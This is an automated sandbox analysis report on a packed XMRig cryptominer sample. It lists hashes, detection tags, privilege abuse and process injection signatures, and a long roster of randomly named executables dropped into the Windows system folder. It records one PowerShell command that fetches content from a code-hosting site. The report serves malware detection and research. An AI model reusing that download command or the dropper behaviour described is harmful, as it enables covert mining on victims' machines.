Malware Analysis Report

2024-11-16 11:23

Sample ID 240612-lfxhjsxdrl
Target 2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe
SHA256 9587e8ad64a0592b2f2b3c8e4d633c6ef741a5e34f5f5fd042460cb5ae52783b
Tags
miner upx xmrig execution
score
10/10

Analysis Overview

score
10/10

SHA256

9587e8ad64a0592b2f2b3c8e4d633c6ef741a5e34f5f5fd042460cb5ae52783b

Threat Level: Known bad

The file 2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 09:29

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 09:29

Reported

2024-06-12 09:31

Platform

win7-20240611-en

Max time kernel

124s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2f15a9ee1c4f0cb5f5dbe3396310e830_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\YbpHpeb.exe

C:\Windows\System\YbpHpeb.exe

C:\Windows\System\OVluWKy.exe

C:\Windows\System\OVluWKy.exe

C:\Windows\System\OZqGJju.exe

C:\Windows\System\OZqGJju.exe

C:\Windows\System\QWgGRwK.exe

C:\Windows\System\QWgGRwK.exe

C:\Windows\System\rRrjrsq.exe

C:\Windows\System\rRrjrsq.exe

C:\Windows\System\XNVcCsP.exe

C:\Windows\System\XNVcCsP.exe

C:\Windows\System\EdoGOrH.exe

C:\Windows\System\EdoGOrH.exe

C:\Windows\System\xhlEOZl.exe

C:\Windows\System\xhlEOZl.exe

C:\Windows\System\WoEoALC.exe

C:\Windows\System\WoEoALC.exe

C:\Windows\System\oxfsrCz.exe

C:\Windows\System\oxfsrCz.exe

C:\Windows\System\aVrKyGU.exe

C:\Windows\System\aVrKyGU.exe

C:\Windows\System\xKAOSDD.exe

C:\Windows\System\xKAOSDD.exe

C:\Windows\System\AJGRSDJ.exe

C:\Windows\System\AJGRSDJ.exe

C:\Windows\System\qoHtYkN.exe

C:\Windows\System\qoHtYkN.exe

C:\Windows\System\NsVHnnk.exe

C:\Windows\System\NsVHnnk.exe

C:\Windows\System\JcOvZoI.exe

C:\Windows\System\JcOvZoI.exe

C:\Windows\System\AlLHqMT.exe

C:\Windows\System\AlLHqMT.exe

C:\Windows\System\RWSVdie.exe

C:\Windows\System\RWSVdie.exe

C:\Windows\System\cDVkkfB.exe

C:\Windows\System\cDVkkfB.exe

C:\Windows\System\dIoWFdh.exe

C:\Windows\System\dIoWFdh.exe

C:\Windows\System\EgQHPGU.exe

C:\Windows\System\EgQHPGU.exe

C:\Windows\System\fMrIHeS.exe

C:\Windows\System\fMrIHeS.exe

C:\Windows\System\BVuzPlu.exe

C:\Windows\System\BVuzPlu.exe

C:\Windows\System\AmMAkbV.exe

C:\Windows\System\AmMAkbV.exe

C:\Windows\System\biUYkKP.exe

C:\Windows\System\biUYkKP.exe

C:\Windows\System\CWTGDHc.exe

C:\Windows\System\CWTGDHc.exe

C:\Windows\System\JTKwsHF.exe

C:\Windows\System\JTKwsHF.exe

C:\Windows\System\AhqPPUJ.exe

C:\Windows\System\AhqPPUJ.exe

C:\Windows\System\lgOzhzq.exe

C:\Windows\System\lgOzhzq.exe

C:\Windows\System\ATzPtBL.exe

C:\Windows\System\ATzPtBL.exe

C:\Windows\System\lnMWxVW.exe

C:\Windows\System\lnMWxVW.exe

C:\Windows\System\AxdySkc.exe

C:\Windows\System\AxdySkc.exe

C:\Windows\System\OSOIfWY.exe

C:\Windows\System\OSOIfWY.exe

C:\Windows\System\RSezjuP.exe

C:\Windows\System\RSezjuP.exe

C:\Windows\System\KbNHksS.exe

C:\Windows\System\KbNHksS.exe

C:\Windows\System\REpFVxr.exe

C:\Windows\System\REpFVxr.exe

C:\Windows\System\ALsXIRQ.exe

C:\Windows\System\ALsXIRQ.exe

C:\Windows\System\kMwUZIK.exe

C:\Windows\System\kMwUZIK.exe

C:\Windows\System\oBJLFUJ.exe

C:\Windows\System\oBJLFUJ.exe

C:\Windows\System\bJHAnuf.exe

C:\Windows\System\bJHAnuf.exe

C:\Windows\System\UNywWMB.exe

C:\Windows\System\UNywWMB.exe

C:\Windows\System\jEqtIkS.exe

C:\Windows\System\jEqtIkS.exe

C:\Windows\System\GRhxbbf.exe

C:\Windows\System\GRhxbbf.exe

C:\Windows\System\wxmSoIj.exe

C:\Windows\System\wxmSoIj.exe

C:\Windows\System\HjGqjJQ.exe

C:\Windows\System\HjGqjJQ.exe

C:\Windows\System\gbXvpCJ.exe

C:\Windows\System\gbXvpCJ.exe

C:\Windows\System\ZQXdJDV.exe

C:\Windows\System\ZQXdJDV.exe

C:\Windows\System\zMlKwFe.exe

C:\Windows\System\zMlKwFe.exe

C:\Windows\System\eGvzYBC.exe

C:\Windows\System\eGvzYBC.exe

C:\Windows\System\nPebNpn.exe

C:\Windows\System\nPebNpn.exe

C:\Windows\System\xfiWlhy.exe

C:\Windows\System\xfiWlhy.exe

C:\Windows\System\QIfpLfi.exe

C:\Windows\System\QIfpLfi.exe

C:\Windows\System\DfBweDk.exe

C:\Windows\System\DfBweDk.exe

C:\Windows\System\rOSJawo.exe

C:\Windows\System\rOSJawo.exe

C:\Windows\System\McyZpcS.exe

C:\Windows\System\McyZpcS.exe

C:\Windows\System\eIEoWwb.exe

C:\Windows\System\eIEoWwb.exe

C:\Windows\System\jQfTwEe.exe

C:\Windows\System\jQfTwEe.exe

C:\Windows\System\uISKxjF.exe

C:\Windows\System\uISKxjF.exe

C:\Windows\System\AMckgcN.exe

C:\Windows\System\AMckgcN.exe

C:\Windows\System\NgWkYRZ.exe

C:\Windows\System\NgWkYRZ.exe

C:\Windows\System\QKWjdcg.exe

C:\Windows\System\QKWjdcg.exe

C:\Windows\System\cCsQGaS.exe

C:\Windows\System\cCsQGaS.exe

C:\Windows\System\XrMHiZv.exe

C:\Windows\System\XrMHiZv.exe

C:\Windows\System\bTwhbGB.exe

C:\Windows\System\bTwhbGB.exe

C:\Windows\System\UiiDtOd.exe

C:\Windows\System\UiiDtOd.exe

C:\Windows\System\FlkblmB.exe

C:\Windows\System\FlkblmB.exe

C:\Windows\System\fsvZVHz.exe

C:\Windows\System\fsvZVHz.exe

C:\Windows\System\OkSrGJt.exe

C:\Windows\System\OkSrGJt.exe

C:\Windows\System\LESZaro.exe

C:\Windows\System\LESZaro.exe

C:\Windows\System\uMbSifL.exe

C:\Windows\System\uMbSifL.exe

C:\Windows\System\lmvcAEh.exe

C:\Windows\System\lmvcAEh.exe

C:\Windows\System\eYtZJTe.exe

C:\Windows\System\eYtZJTe.exe

C:\Windows\System\XeXfZpB.exe

C:\Windows\System\XeXfZpB.exe

C:\Windows\System\PsLUiQJ.exe

C:\Windows\System\PsLUiQJ.exe

C:\Windows\System\JyWxAsw.exe

C:\Windows\System\JyWxAsw.exe

C:\Windows\System\ZCROJOQ.exe

C:\Windows\System\ZCROJOQ.exe

C:\Windows\System\WezHLXG.exe

C:\Windows\System\WezHLXG.exe

C:\Windows\System\FAweoZa.exe

C:\Windows\System\FAweoZa.exe

C:\Windows\System\hIlTEiN.exe

C:\Windows\System\hIlTEiN.exe

C:\Windows\System\tIAuQdN.exe

C:\Windows\System\tIAuQdN.exe

C:\Windows\System\JhMrPHj.exe

C:\Windows\System\JhMrPHj.exe

C:\Windows\System\guwRcxT.exe

C:\Windows\System\guwRcxT.exe

C:\Windows\System\JwtosHx.exe

C:\Windows\System\JwtosHx.exe

C:\Windows\System\OQkNkmy.exe

C:\Windows\System\OQkNkmy.exe

C:\Windows\System\SIlYVIz.exe

C:\Windows\System\SIlYVIz.exe

C:\Windows\System\HhRzUuO.exe

C:\Windows\System\HhRzUuO.exe

C:\Windows\System\RiwAClM.exe

C:\Windows\System\RiwAClM.exe

C:\Windows\System\vaFPGLc.exe

C:\Windows\System\vaFPGLc.exe

C:\Windows\System\JacrvFL.exe

C:\Windows\System\JacrvFL.exe

C:\Windows\System\cdufiMs.exe

C:\Windows\System\cdufiMs.exe

C:\Windows\System\LVPydsf.exe

C:\Windows\System\LVPydsf.exe

C:\Windows\System\zgmQZJA.exe

C:\Windows\System\zgmQZJA.exe

C:\Windows\System\XwtJive.exe

C:\Windows\System\XwtJive.exe

C:\Windows\System\idDYlWj.exe

C:\Windows\System\idDYlWj.exe

C:\Windows\System\QNqIeuG.exe

C:\Windows\System\QNqIeuG.exe

C:\Windows\System\iWlsnlA.exe

C:\Windows\System\iWlsnlA.exe

C:\Windows\System\GqRdkgO.exe

C:\Windows\System\GqRdkgO.exe

C:\Windows\System\qVVTtqL.exe

C:\Windows\System\qVVTtqL.exe

C:\Windows\System\NXpcuXv.exe

C:\Windows\System\NXpcuXv.exe

C:\Windows\System\lUTixWE.exe

C:\Windows\System\lUTixWE.exe

C:\Windows\System\fiMWCko.exe

C:\Windows\System\fiMWCko.exe

C:\Windows\System\aDLLNkI.exe

C:\Windows\System\aDLLNkI.exe

C:\Windows\System\zxUlihp.exe

C:\Windows\System\zxUlihp.exe

C:\Windows\System\OSLrkCN.exe

C:\Windows\System\OSLrkCN.exe

C:\Windows\System\eVBGhuK.exe

C:\Windows\System\eVBGhuK.exe

C:\Windows\System\OIUKkUA.exe

C:\Windows\System\OIUKkUA.exe

C:\Windows\System\gFKcdVN.exe

C:\Windows\System\gFKcdVN.exe

C:\Windows\System\cmWXsRf.exe

C:\Windows\System\cmWXsRf.exe

C:\Windows\System\KWmWeEK.exe

C:\Windows\System\KWmWeEK.exe

C:\Windows\System\HhUCXJr.exe

C:\Windows\System\HhUCXJr.exe

C:\Windows\System\NwpOgIR.exe

C:\Windows\System\NwpOgIR.exe

C:\Windows\System\WoYdqIe.exe

C:\Windows\System\WoYdqIe.exe

C:\Windows\System\zbiAyeR.exe

C:\Windows\System\zbiAyeR.exe

C:\Windows\System\XVcNTzW.exe

C:\Windows\System\XVcNTzW.exe

C:\Windows\System\fJNMaZd.exe

C:\Windows\System\fJNMaZd.exe

C:\Windows\System\Cibqtwd.exe

C:\Windows\System\Cibqtwd.exe

C:\Windows\System\pjTVcap.exe

C:\Windows\System\pjTVcap.exe

C:\Windows\System\ablpbRT.exe

C:\Windows\System\ablpbRT.exe

C:\Windows\System\CUEdOEV.exe

C:\Windows\System\CUEdOEV.exe

C:\Windows\System\aVTFlqS.exe

C:\Windows\System\aVTFlqS.exe

C:\Windows\System\rbbJRLM.exe

C:\Windows\System\rbbJRLM.exe

C:\Windows\System\EILlVxd.exe

C:\Windows\System\EILlVxd.exe

C:\Windows\System\QtKFYSu.exe

C:\Windows\System\QtKFYSu.exe

C:\Windows\System\YUEifTv.exe

C:\Windows\System\YUEifTv.exe

C:\Windows\System\SDAzgjY.exe

C:\Windows\System\SDAzgjY.exe

C:\Windows\System\umgXXhX.exe

C:\Windows\System\umgXXhX.exe

C:\Windows\System\uGNqcHC.exe

C:\Windows\System\uGNqcHC.exe

C:\Windows\System\MHhvQUm.exe

C:\Windows\System\MHhvQUm.exe

C:\Windows\System\YSbOXAz.exe

C:\Windows\System\YSbOXAz.exe

C:\Windows\System\cCDaBli.exe

C:\Windows\System\cCDaBli.exe

C:\Windows\System\eaHwYln.exe

C:\Windows\System\eaHwYln.exe

C:\Windows\System\oWpvtCP.exe

C:\Windows\System\oWpvtCP.exe

C:\Windows\System\VnUUcLp.exe

C:\Windows\System\VnUUcLp.exe

C:\Windows\System\zuQxWIz.exe

C:\Windows\System\zuQxWIz.exe

C:\Windows\System\RMWNodl.exe

C:\Windows\System\RMWNodl.exe

C:\Windows\System\RvwaIag.exe

C:\Windows\System\RvwaIag.exe

C:\Windows\System\fqikDyH.exe

C:\Windows\System\fqikDyH.exe

C:\Windows\System\ZsEKziS.exe

C:\Windows\System\ZsEKziS.exe

C:\Windows\System\facPurZ.exe

C:\Windows\System\facPurZ.exe

C:\Windows\System\ZMDYpAs.exe

C:\Windows\System\ZMDYpAs.exe

C:\Windows\System\ZLOgYkE.exe

C:\Windows\System\ZLOgYkE.exe

C:\Windows\System\hIAvvKA.exe

C:\Windows\System\hIAvvKA.exe

C:\Windows\System\tQdxLkU.exe

C:\Windows\System\tQdxLkU.exe

C:\Windows\System\zDgJmAT.exe

C:\Windows\System\zDgJmAT.exe

C:\Windows\System\OupFWtt.exe

C:\Windows\System\OupFWtt.exe

C:\Windows\System\KQKndLY.exe

C:\Windows\System\KQKndLY.exe

C:\Windows\System\fDvPXdU.exe

C:\Windows\System\fDvPXdU.exe

C:\Windows\System\JEoFWfS.exe

C:\Windows\System\JEoFWfS.exe

C:\Windows\System\SnAGvAz.exe

C:\Windows\System\SnAGvAz.exe

C:\Windows\System\wetCtcT.exe

C:\Windows\System\wetCtcT.exe

C:\Windows\System\SxLjGco.exe

C:\Windows\System\SxLjGco.exe

C:\Windows\System\osAOXAy.exe

C:\Windows\System\osAOXAy.exe

C:\Windows\System\zAYFnjX.exe

C:\Windows\System\zAYFnjX.exe

C:\Windows\System\uZZXiEM.exe

C:\Windows\System\uZZXiEM.exe

C:\Windows\System\XVqXxKe.exe

C:\Windows\System\XVqXxKe.exe

C:\Windows\System\BpCLNFC.exe

C:\Windows\System\BpCLNFC.exe

C:\Windows\System\mqPGKpP.exe

C:\Windows\System\mqPGKpP.exe

C:\Windows\System\iPCVZzY.exe

C:\Windows\System\iPCVZzY.exe

C:\Windows\System\ydJkwuA.exe

C:\Windows\System\ydJkwuA.exe

C:\Windows\System\iqPOMjg.exe

C:\Windows\System\iqPOMjg.exe

C:\Windows\System\iONZaQP.exe

C:\Windows\System\iONZaQP.exe

C:\Windows\System\yQIlQdh.exe

C:\Windows\System\yQIlQdh.exe

C:\Windows\System\pDpebjY.exe

C:\Windows\System\pDpebjY.exe

C:\Windows\System\pxONGRf.exe

C:\Windows\System\pxONGRf.exe

C:\Windows\System\sEHcRUU.exe

C:\Windows\System\sEHcRUU.exe

C:\Windows\System\qQaxpWT.exe

C:\Windows\System\qQaxpWT.exe

C:\Windows\System\lNIgcly.exe

C:\Windows\System\lNIgcly.exe

C:\Windows\System\GrgOVgX.exe

C:\Windows\System\GrgOVgX.exe

C:\Windows\System\snUiSzB.exe

C:\Windows\System\snUiSzB.exe

C:\Windows\System\RNrByTA.exe

C:\Windows\System\RNrByTA.exe

C:\Windows\System\ExJjKBU.exe

C:\Windows\System\ExJjKBU.exe

C:\Windows\System\IAaixVq.exe

C:\Windows\System\IAaixVq.exe

C:\Windows\System\SlxSNYE.exe

C:\Windows\System\SlxSNYE.exe

C:\Windows\System\YibFRdR.exe

C:\Windows\System\YibFRdR.exe

C:\Windows\System\goQmwfw.exe

C:\Windows\System\goQmwfw.exe

C:\Windows\System\qGGIvTK.exe

C:\Windows\System\qGGIvTK.exe

C:\Windows\System\TEajyij.exe

C:\Windows\System\TEajyij.exe

C:\Windows\System\slmiyZE.exe

C:\Windows\System\slmiyZE.exe

C:\Windows\System\OefpHpW.exe

C:\Windows\System\OefpHpW.exe

C:\Windows\System\EyTyxgC.exe

C:\Windows\System\EyTyxgC.exe

C:\Windows\System\vFUvJCo.exe

C:\Windows\System\vFUvJCo.exe

C:\Windows\System\efbAYcK.exe

C:\Windows\System\efbAYcK.exe

C:\Windows\System\cxYLleC.exe

C:\Windows\System\cxYLleC.exe

C:\Windows\System\EVKiQSl.exe

C:\Windows\System\EVKiQSl.exe

C:\Windows\System\fTcSxIY.exe

C:\Windows\System\fTcSxIY.exe

C:\Windows\System\lsYVGDw.exe

C:\Windows\System\lsYVGDw.exe

C:\Windows\System\DhDnIFz.exe

C:\Windows\System\DhDnIFz.exe

C:\Windows\System\eiHzABV.exe

C:\Windows\System\eiHzABV.exe

C:\Windows\System\yQRTKLZ.exe

C:\Windows\System\yQRTKLZ.exe

C:\Windows\System\PNpqtVU.exe

C:\Windows\System\PNpqtVU.exe

C:\Windows\System\xuiarZI.exe

C:\Windows\System\xuiarZI.exe

C:\Windows\System\jfwZsPN.exe

C:\Windows\System\jfwZsPN.exe

C:\Windows\System\ILSbaqL.exe

C:\Windows\System\ILSbaqL.exe

C:\Windows\System\WMesDQp.exe

C:\Windows\System\WMesDQp.exe

C:\Windows\System\HHOADnx.exe

C:\Windows\System\HHOADnx.exe

C:\Windows\System\CCAdllM.exe

C:\Windows\System\CCAdllM.exe

C:\Windows\System\wNgKDYQ.exe

C:\Windows\System\wNgKDYQ.exe

C:\Windows\System\OrwPqWZ.exe

C:\Windows\System\OrwPqWZ.exe

C:\Windows\System\FvGjisg.exe

C:\Windows\System\FvGjisg.exe

C:\Windows\System\GphPTSq.exe

C:\Windows\System\GphPTSq.exe

C:\Windows\System\PGjYfjr.exe

C:\Windows\System\PGjYfjr.exe

C:\Windows\System\AaaKJXB.exe

C:\Windows\System\AaaKJXB.exe

C:\Windows\System\lFICbPi.exe

C:\Windows\System\lFICbPi.exe

C:\Windows\System\wmCQsOu.exe

C:\Windows\System\wmCQsOu.exe

C:\Windows\System\GDICAje.exe

C:\Windows\System\GDICAje.exe

C:\Windows\System\niycnZP.exe

C:\Windows\System\niycnZP.exe

C:\Windows\System\IlipkZH.exe

C:\Windows\System\IlipkZH.exe

C:\Windows\System\aqcgzci.exe

C:\Windows\System\aqcgzci.exe

C:\Windows\System\Dxsavri.exe

C:\Windows\System\Dxsavri.exe

C:\Windows\System\wCBzjAL.exe

C:\Windows\System\wCBzjAL.exe

C:\Windows\System\PeZfyAx.exe

C:\Windows\System\PeZfyAx.exe

C:\Windows\System\hmoocPY.exe

C:\Windows\System\hmoocPY.exe

C:\Windows\System\MeuvcYX.exe

C:\Windows\System\MeuvcYX.exe

C:\Windows\System\LqUeqzw.exe

C:\Windows\System\LqUeqzw.exe

C:\Windows\System\CUqYXin.exe

C:\Windows\System\CUqYXin.exe

C:\Windows\System\OayOsDK.exe

C:\Windows\System\OayOsDK.exe

C:\Windows\System\pmNJxsd.exe

C:\Windows\System\pmNJxsd.exe

C:\Windows\System\viEcoqC.exe

C:\Windows\System\viEcoqC.exe

C:\Windows\System\otkFZip.exe

C:\Windows\System\otkFZip.exe

C:\Windows\System\QTrNTwP.exe

C:\Windows\System\QTrNTwP.exe

C:\Windows\System\GQYkTbs.exe

C:\Windows\System\GQYkTbs.exe

C:\Windows\System\TrzuIei.exe

C:\Windows\System\TrzuIei.exe

C:\Windows\System\FOMtsQl.exe

C:\Windows\System\FOMtsQl.exe

C:\Windows\System\IRgQUWJ.exe

C:\Windows\System\IRgQUWJ.exe

C:\Windows\System\VQlPSbT.exe

C:\Windows\System\VQlPSbT.exe

C:\Windows\System\aFAmhja.exe

C:\Windows\System\aFAmhja.exe

C:\Windows\System\mlrjMNa.exe

C:\Windows\System\mlrjMNa.exe

C:\Windows\System\UQOqxkN.exe

C:\Windows\System\UQOqxkN.exe

C:\Windows\System\GFJeTyt.exe

C:\Windows\System\GFJeTyt.exe

C:\Windows\System\zhirBUr.exe

C:\Windows\System\zhirBUr.exe

C:\Windows\System\njdyMsn.exe

C:\Windows\System\njdyMsn.exe

C:\Windows\System\ritxGKZ.exe

C:\Windows\System\ritxGKZ.exe

C:\Windows\System\GOVFlbu.exe

C:\Windows\System\GOVFlbu.exe

C:\Windows\System\brvuRKz.exe

C:\Windows\System\brvuRKz.exe

C:\Windows\System\CvChzaX.exe

C:\Windows\System\CvChzaX.exe

C:\Windows\System\PHLXJkj.exe

C:\Windows\System\PHLXJkj.exe

C:\Windows\System\lOuhPVG.exe

C:\Windows\System\lOuhPVG.exe

C:\Windows\System\jqRMOKA.exe

C:\Windows\System\jqRMOKA.exe

C:\Windows\System\EToHlCR.exe

C:\Windows\System\EToHlCR.exe

C:\Windows\System\sYqbZYP.exe

C:\Windows\System\sYqbZYP.exe

C:\Windows\System\QTTQrxj.exe

C:\Windows\System\QTTQrxj.exe

C:\Windows\System\XeVtfJV.exe

C:\Windows\System\XeVtfJV.exe

C:\Windows\System\XOYjovr.exe

C:\Windows\System\XOYjovr.exe

C:\Windows\System\JGwDfwt.exe

C:\Windows\System\JGwDfwt.exe

C:\Windows\System\AYLIeyb.exe

C:\Windows\System\AYLIeyb.exe

C:\Windows\System\kPYrcDm.exe

C:\Windows\System\kPYrcDm.exe

C:\Windows\System\CTXHFIe.exe

C:\Windows\System\CTXHFIe.exe

C:\Windows\System\zULMWrl.exe

C:\Windows\System\zULMWrl.exe

C:\Windows\System\iBpZRNE.exe

C:\Windows\System\iBpZRNE.exe

C:\Windows\System\upicwXy.exe

C:\Windows\System\upicwXy.exe

C:\Windows\System\nZiZYpR.exe

C:\Windows\System\nZiZYpR.exe

C:\Windows\System\FUCSnCx.exe

C:\Windows\System\FUCSnCx.exe

C:\Windows\System\PbBiEFr.exe

C:\Windows\System\PbBiEFr.exe

C:\Windows\System\FriBCTq.exe

C:\Windows\System\FriBCTq.exe

C:\Windows\System\DLXNsFA.exe

C:\Windows\System\DLXNsFA.exe

C:\Windows\System\EuOnNmc.exe

C:\Windows\System\EuOnNmc.exe

C:\Windows\System\vlEhvza.exe

C:\Windows\System\vlEhvza.exe

C:\Windows\System\DgjDjdj.exe

C:\Windows\System\DgjDjdj.exe

C:\Windows\System\KbfvtXD.exe

C:\Windows\System\KbfvtXD.exe

C:\Windows\System\HLEFTHX.exe

C:\Windows\System\HLEFTHX.exe

C:\Windows\System\dtPpAur.exe

C:\Windows\System\dtPpAur.exe

C:\Windows\System\avSlJMT.exe

C:\Windows\System\avSlJMT.exe

C:\Windows\System\dffoMre.exe

C:\Windows\System\dffoMre.exe

C:\Windows\System\Buscqrx.exe

C:\Windows\System\Buscqrx.exe

C:\Windows\System\uUrpYeG.exe

C:\Windows\System\uUrpYeG.exe

C:\Windows\System\uBsUhjw.exe

C:\Windows\System\uBsUhjw.exe

C:\Windows\System\iHbBYEg.exe

C:\Windows\System\iHbBYEg.exe

C:\Windows\System\vmWaIaz.exe

C:\Windows\System\vmWaIaz.exe

C:\Windows\System\BaxgUOd.exe

C:\Windows\System\BaxgUOd.exe

C:\Windows\System\HMfFSke.exe

C:\Windows\System\HMfFSke.exe

C:\Windows\System\boIXDZw.exe

C:\Windows\System\boIXDZw.exe

C:\Windows\System\vbhfgdh.exe

C:\Windows\System\vbhfgdh.exe

C:\Windows\System\rUvEpIJ.exe

C:\Windows\System\rUvEpIJ.exe

C:\Windows\System\CqslbIx.exe

C:\Windows\System\CqslbIx.exe

C:\Windows\System\tIJGocq.exe

C:\Windows\System\tIJGocq.exe

C:\Windows\System\IRaIVrB.exe

C:\Windows\System\IRaIVrB.exe

C:\Windows\System\nHXlAZB.exe

C:\Windows\System\nHXlAZB.exe

C:\Windows\System\shGpCLH.exe

C:\Windows\System\shGpCLH.exe

C:\Windows\System\hZWgvMk.exe

C:\Windows\System\hZWgvMk.exe

C:\Windows\System\yjKxoqS.exe

C:\Windows\System\yjKxoqS.exe

C:\Windows\System\WSnDBYx.exe

C:\Windows\System\WSnDBYx.exe

C:\Windows\System\gcloHMf.exe

C:\Windows\System\gcloHMf.exe

C:\Windows\System\jIofxOt.exe

C:\Windows\System\jIofxOt.exe

C:\Windows\System\ZyBNLWn.exe

C:\Windows\System\ZyBNLWn.exe

C:\Windows\System\hQjezfa.exe

C:\Windows\System\hQjezfa.exe

C:\Windows\System\ynPsHGR.exe

C:\Windows\System\ynPsHGR.exe

C:\Windows\System\OUMlOWB.exe

C:\Windows\System\OUMlOWB.exe

C:\Windows\System\fALmYfa.exe

C:\Windows\System\fALmYfa.exe

C:\Windows\System\gnvXEtF.exe

C:\Windows\System\gnvXEtF.exe

C:\Windows\System\mLthfIp.exe

C:\Windows\System\mLthfIp.exe

C:\Windows\System\aPvBMvA.exe

C:\Windows\System\aPvBMvA.exe

C:\Windows\System\DzLlaaC.exe

C:\Windows\System\DzLlaaC.exe

C:\Windows\System\FWZxgZW.exe

C:\Windows\System\FWZxgZW.exe

C:\Windows\System\uUqGojD.exe

C:\Windows\System\uUqGojD.exe

C:\Windows\System\wlSKaGe.exe

C:\Windows\System\wlSKaGe.exe

C:\Windows\System\zAQxSKF.exe

C:\Windows\System\zAQxSKF.exe

C:\Windows\System\DzOlZOq.exe

C:\Windows\System\DzOlZOq.exe

C:\Windows\System\cjQdCPQ.exe

C:\Windows\System\cjQdCPQ.exe

C:\Windows\System\ZtiYQjs.exe

C:\Windows\System\ZtiYQjs.exe

C:\Windows\System\KnpyNSE.exe

C:\Windows\System\KnpyNSE.exe

C:\Windows\System\MzmJZrR.exe

C:\Windows\System\MzmJZrR.exe

C:\Windows\System\PVVEGYk.exe

C:\Windows\System\PVVEGYk.exe

C:\Windows\System\eqcasEl.exe

C:\Windows\System\eqcasEl.exe

C:\Windows\System\oWFCKRM.exe

C:\Windows\System\oWFCKRM.exe

C:\Windows\System\PbcYyXS.exe

C:\Windows\System\PbcYyXS.exe

C:\Windows\System\btlPyJA.exe

C:\Windows\System\btlPyJA.exe

C:\Windows\System\CazFMRY.exe

C:\Windows\System\CazFMRY.exe

C:\Windows\System\iwWvivH.exe

C:\Windows\System\iwWvivH.exe

C:\Windows\System\CFJeusy.exe

C:\Windows\System\CFJeusy.exe

C:\Windows\System\LljvUMy.exe

C:\Windows\System\LljvUMy.exe

C:\Windows\System\kqoWYBZ.exe

C:\Windows\System\kqoWYBZ.exe

C:\Windows\System\EijdgJp.exe

C:\Windows\System\EijdgJp.exe

C:\Windows\System\BbzOAVK.exe

C:\Windows\System\BbzOAVK.exe

C:\Windows\System\LsMAtma.exe

C:\Windows\System\LsMAtma.exe

C:\Windows\System\cvgzYmn.exe

C:\Windows\System\cvgzYmn.exe

C:\Windows\System\CYyCXmI.exe

C:\Windows\System\CYyCXmI.exe

C:\Windows\System\iNsKaHR.exe

C:\Windows\System\iNsKaHR.exe

C:\Windows\System\NgFRWpV.exe

C:\Windows\System\NgFRWpV.exe

C:\Windows\System\saNqPdT.exe

C:\Windows\System\saNqPdT.exe

C:\Windows\System\OHfRkLQ.exe

C:\Windows\System\OHfRkLQ.exe

C:\Windows\System\BxkCZzs.exe

C:\Windows\System\BxkCZzs.exe

C:\Windows\System\BYwpMeE.exe

C:\Windows\System\BYwpMeE.exe

C:\Windows\System\WmjvcsW.exe

C:\Windows\System\WmjvcsW.exe

C:\Windows\System\wZtQvNB.exe

C:\Windows\System\wZtQvNB.exe

C:\Windows\System\bJZXKJX.exe

C:\Windows\System\bJZXKJX.exe

C:\Windows\System\EyGccIh.exe

C:\Windows\System\EyGccIh.exe

C:\Windows\System\RldjdoX.exe

C:\Windows\System\RldjdoX.exe

C:\Windows\System\VezGUiZ.exe

C:\Windows\System\VezGUiZ.exe

C:\Windows\System\hTFtvNP.exe

C:\Windows\System\hTFtvNP.exe

C:\Windows\System\nlPYnqM.exe

C:\Windows\System\nlPYnqM.exe

C:\Windows\System\YFMcMPe.exe

C:\Windows\System\YFMcMPe.exe

C:\Windows\System\SvyuNOy.exe

C:\Windows\System\SvyuNOy.exe

C:\Windows\System\SAgKMro.exe

C:\Windows\System\SAgKMro.exe

C:\Windows\System\oNvLEpi.exe

C:\Windows\System\oNvLEpi.exe

C:\Windows\System\qcaUXRL.exe

C:\Windows\System\qcaUXRL.exe

C:\Windows\System\OoGSRkN.exe

C:\Windows\System\OoGSRkN.exe

C:\Windows\System\uZnsZjz.exe

C:\Windows\System\uZnsZjz.exe

C:\Windows\System\vfcKlAt.exe

C:\Windows\System\vfcKlAt.exe

C:\Windows\System\dVHuytY.exe

C:\Windows\System\dVHuytY.exe

C:\Windows\System\ziQvLBg.exe

C:\Windows\System\ziQvLBg.exe

C:\Windows\System\YUCPxcn.exe

C:\Windows\System\YUCPxcn.exe

C:\Windows\System\eDSNahN.exe

C:\Windows\System\eDSNahN.exe

C:\Windows\System\pundkUI.exe

C:\Windows\System\pundkUI.exe

C:\Windows\System\smhBsHL.exe

C:\Windows\System\smhBsHL.exe

C:\Windows\System\fnuXCMw.exe

C:\Windows\System\fnuXCMw.exe

C:\Windows\System\UTNiJFr.exe

